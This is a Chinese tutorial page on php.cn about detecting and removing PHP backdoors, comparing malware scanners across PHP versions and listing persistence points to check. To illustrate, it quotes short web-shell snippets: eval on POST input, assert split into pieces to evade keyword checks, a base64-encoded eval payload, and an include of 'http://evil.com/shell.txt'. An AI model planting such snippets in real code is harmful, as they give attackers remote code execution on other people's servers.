0

0

PHP后门怎么删除_不同PHP版本查杀工具兼容性咋选【方法】

看不見的法師

看不見的法師

发布时间:2026-02-03 12:51:11

|

675人浏览过

|

来源于php中文网

原创

PHP后门无法靠一键查杀工具彻底清除,需人工审计+版本感知静态扫描+运行时监控;隐蔽后门常伪装成日志、图片或主题文件,并用字符串拼接、动态函数调用、多层解码等方式绕过检测。

php后门怎么删除_不同php版本查杀工具兼容性咋选【方法】

PHP后门不能靠“一键查杀工具”彻底清除,尤其当攻击者已获取写权限、混淆代码或利用合法功能(如 evalassertbase64_decode 嵌套调用)时,自动化工具大概率漏报。真正有效的清理必须结合人工审计 + 版本感知的静态扫描 + 运行时行为监控。

怎么看文件里藏了隐蔽的PHP后门

别只盯着 shell.php1.php 这类明显名字——后门常伪装成日志备份(error_log.bak)、图片(1.jpg 但内容是 PHP)、主题文件(functions.php 末尾追加 @eval($_POST['x'])),或用动态函数绕过关键词检测:

  • call_user_func('ass'.'ert', $_POST['a']) —— 拆分字符串规避 assert 字面匹配
  • $a = 'base64_decode'; $a('PD9waHAgZXZhbCgkX1BPUlRbJ2MnXSk7')); —— 变量存函数名 + 多层解码
  • WordPress 插件目录下出现无作者信息、无更新记录的陌生插件 ZIP,解压后含 wp-content/plugins/xxx/inc/backdoor.php

不同PHP版本下哪些查杀工具真能用

工具兼容性不只看“支持PHP7/8”,更要看它是否适配对应版本的语法特性(如 PHP 8.0+ 的联合类型、属性语法)和扩展行为(如 pcntlffi 调用可能被用于隐藏通信)。主流工具实际表现如下:

  • php-malware-finder:支持 PHP 5.6–8.3,对 preg_replace('/.*/e' 这类已废弃但旧站仍存的漏洞模式识别强;但对 PHP 8.1+ 的 #[\Attribute] 注解内嵌恶意逻辑无检测能力
  • linux-malware-detect (LMD):依赖签名库,对常见 WebShell(如 ChinaChopperWEBSHELL 变种)检出率高;但默认不解析 PHP 语法,无法发现自定义加密后门
  • phpscanner(GitHub 上轻量工具):基于 AST 分析,PHP 7.4+ 兼容好;能识别 create_function 替代方案(如匿名函数 + extract),但对 FFI::cdef 调用外部恶意 so 库完全无感知

删完后怎么防它再回来

删除单个后门文件只是起点。若未修复根本入口,几小时内就会复发。重点检查以下位置:

DeepBrain
DeepBrain

AI视频生成工具,ChatGPT +生成式视频AI =你可以制作伟大的视频!

下载

立即学习PHP免费学习笔记(深入)”;

  • Web 目录外的可写路径是否被用于落地持久化后门(如 /tmp/.systemd/ 下的 run.sh 定时 wget 新后门)
  • 数据库中是否注入了恶意字段值(如 WordPress 的 wp_options 表中 theme_mods_twentytwentyone 值含 base64 编码的 PHP 代码)
  • PHP 配置中 disable_functions 是否被绕过(例如未禁用 shell_exec 却禁了 exec,攻击者直接切函数调用)
  • 是否有启用 allow_url_include = On —— 这会让 include('http://evil.com/shell.txt') 直接生效,比任何文件后门都难追踪

最麻烦的是那些改了核心 CMS 文件、又打上“已更新”标记的后门——它不会出现在 diff 工具的增量列表里,因为修改点被刻意混在正常功能补丁中。这时候得靠运行时日志:开启 log_errors = On + error_log = /var/log/php-app.log,并监控所有含 evalassertcreate_function 的调用,而不是只扫磁盘文件。

热门AI工具

更多
DeepSeek
DeepSeek

幻方量化公司旗下的开源大模型平台

豆包大模型
豆包大模型

字节跳动自主研发的一系列大型语言模型

通义千问
通义千问

阿里巴巴推出的全能AI助手

腾讯元宝
腾讯元宝

腾讯混元平台推出的AI助手

文心一言
文心一言

文心一言是百度开发的AI聊天机器人,通过对话可以生成各种形式的内容。

讯飞写作
讯飞写作

基于讯飞星火大模型的AI写作工具,可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

即梦AI
即梦AI

一站式AI创作平台,免费AI图片和视频生成。

ChatGPT
ChatGPT

最最强大的AI聊天机器人程序,ChatGPT不单是聊天机器人,还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

相关专题

更多
js 字符串转数组
js 字符串转数组

js字符串转数组的方法:1、使用“split()”方法;2、使用“Array.from()”方法;3、使用for循环遍历;4、使用“Array.split()”方法。本专题为大家提供js字符串转数组的相关的文章、下载、课程内容,供大家免费下载体验。

361

2023.08.03

js截取字符串的方法
js截取字符串的方法

js截取字符串的方法有substring()方法、substr()方法、slice()方法、split()方法和slice()方法。本专题为大家提供字符串相关的文章、下载、课程内容,供大家免费下载体验。

213

2023.09.04

java基础知识汇总
java基础知识汇总

java基础知识有Java的历史和特点、Java的开发环境、Java的基本数据类型、变量和常量、运算符和表达式、控制语句、数组和字符串等等知识点。想要知道更多关于java基础知识的朋友,请阅读本专题下面的的有关文章,欢迎大家来php中文网学习。

1505

2023.10.24

字符串介绍
字符串介绍

字符串是一种数据类型,它可以是任何文本,包括字母、数字、符号等。字符串可以由不同的字符组成,例如空格、标点符号、数字等。在编程中,字符串通常用引号括起来,如单引号、双引号或反引号。想了解更多字符串的相关内容,可以阅读本专题下面的文章。

625

2023.11.24

java读取文件转成字符串的方法
java读取文件转成字符串的方法

Java8引入了新的文件I/O API,使用java.nio.file.Files类读取文件内容更加方便。对于较旧版本的Java,可以使用java.io.FileReader和java.io.BufferedReader来读取文件。在这些方法中,你需要将文件路径替换为你的实际文件路径,并且可能需要处理可能的IOException异常。想了解更多java的相关内容,可以阅读本专题下面的文章。

718

2024.03.22

php中定义字符串的方式
php中定义字符串的方式

php中定义字符串的方式:单引号;双引号;heredoc语法等等。想了解更多字符串的相关内容,可以阅读本专题下面的文章。

670

2024.04.29

go语言字符串相关教程
go语言字符串相关教程

本专题整合了go语言字符串相关教程,阅读专题下面的文章了解更多详细内容。

175

2025.07.29

c++字符串相关教程
c++字符串相关教程

本专题整合了c++字符串相关教程,阅读专题下面的文章了解更多详细内容。

84

2025.08.07

c语言中/相关合集
c语言中/相关合集

本专题整合了c语言中/的用法、含义解释。阅读专题下面的文章了解更多详细内容。

0

2026.02.03

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
PHP课程
PHP课程

共137课时 | 10.9万人学习

JavaScript ES5基础线上课程教学
JavaScript ES5基础线上课程教学

共6课时 | 11.2万人学习

PHP新手语法线上课程教学
PHP新手语法线上课程教学

共13课时 | 0.9万人学习

关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号